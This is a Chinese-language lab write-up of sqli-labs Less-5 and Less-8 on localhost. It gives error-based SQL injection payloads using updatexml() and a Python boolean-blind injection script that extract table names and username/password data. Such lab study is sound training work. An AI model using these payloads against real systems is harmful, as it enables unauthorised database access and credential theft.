sqllabs5:(报错注入)
?id=1 回显You are in...........
?id=2-1 回显You are in...........
?id=1' 回显' '1'' LIMIT 0,1 '
判断是字符型,'闭合。
?id=1'order by 3--+ //页面显示正常
我们试了4行得出是报错注入
我们先爆库名
http://127.0.0.1/sqli-labs-master/Less-5/?id='and updatexml(1,concat(0x7e,(select database()),0x7e),3)--+
拿下库名:security
爆表名
http://127.0.0.1/sqli-labs-master/Less-5/?id=-1%27%20and%20updatexml(1,concat(0x7e,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27)),1)%20--+
拿下表名
然后爆字段:
http://127.0.0.1/sqli-labs-master/Less-5/?id=-1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security')),1) --+
爆数据:
http://127.0.0.1/sqli-labs-master/Less-5/?id=-1' and updatexml(1,concat(0x7e,(select group_concat(username,0x7e,password) from users)),1) --+
数据不完整,因为updatexml()函数的报错内容不超过32个字符,所以我们还需要对数据进行处理
使用substring()函数对结果字符进行处理
?id=-1' and updatexml(1,concat(0x7e,substring((select group_concat(username,0x7e,password) from users),32,64)),1) --+
之后我们就可以不断改变位置,这样我们就可以得到所有数据,后续的操作不再演示
sqllabs8:布尔盲注
报错注入被注释掉了
联合查询只出现you are in ..........
所以这里我们能看见一真一假(页面特征)
不加'时为真
http://127.0.0.1/sqli-labs-master/Less-8/?id=1
加入'时为假
http://127.0.0.1/sqli-labs-master/Less-8/?id=1'
我们可以用布尔盲注
我们数据库名:
security,s的ascii码是115,我们可以一个一个试一试
http://127.0.0.1/sqli-labs-master/Less-8//?id=1' and ascii(substring((select database()),1,1))=115--+
利用二分法和ASCII码进行渗透:
根据此现象我们写一个python脚本快速进行注入
import time
import requests
url = 'http://127.0.0.1/sqli-labs-master/Less-8/index.php'
def inject_database(url):
name = ''
for i in range(1, 50):
low = 32
high = 128
mid = (low + high) // 2
while low < high:
payload = "1' and ascii(substr(database(), %d, 1)) > %d-- " % (i, mid)
res = {"id": payload}
# start_time = time.time()
r = requests.get(url, params=res)
# end_time = time.time()
if 'You are in...........' in r.text:
low = mid + 1
else:
high = mid
mid = (low + high) // 2
if mid == 32:
break
name = name + chr(mid)
print(name)
inject_database(url)
爆库名;
爆表名:
payload = "1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()), %d, 1)) > %d-- " % (i, mid)
爆列名:
payload = "1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'), %d, 1)) > %d-- " % (i, mid)
爆数据:
payload = "1' and ascii(substr((select group_concat(username,'$',password) from users), %d, 1)) > %d-- " % (i, mid)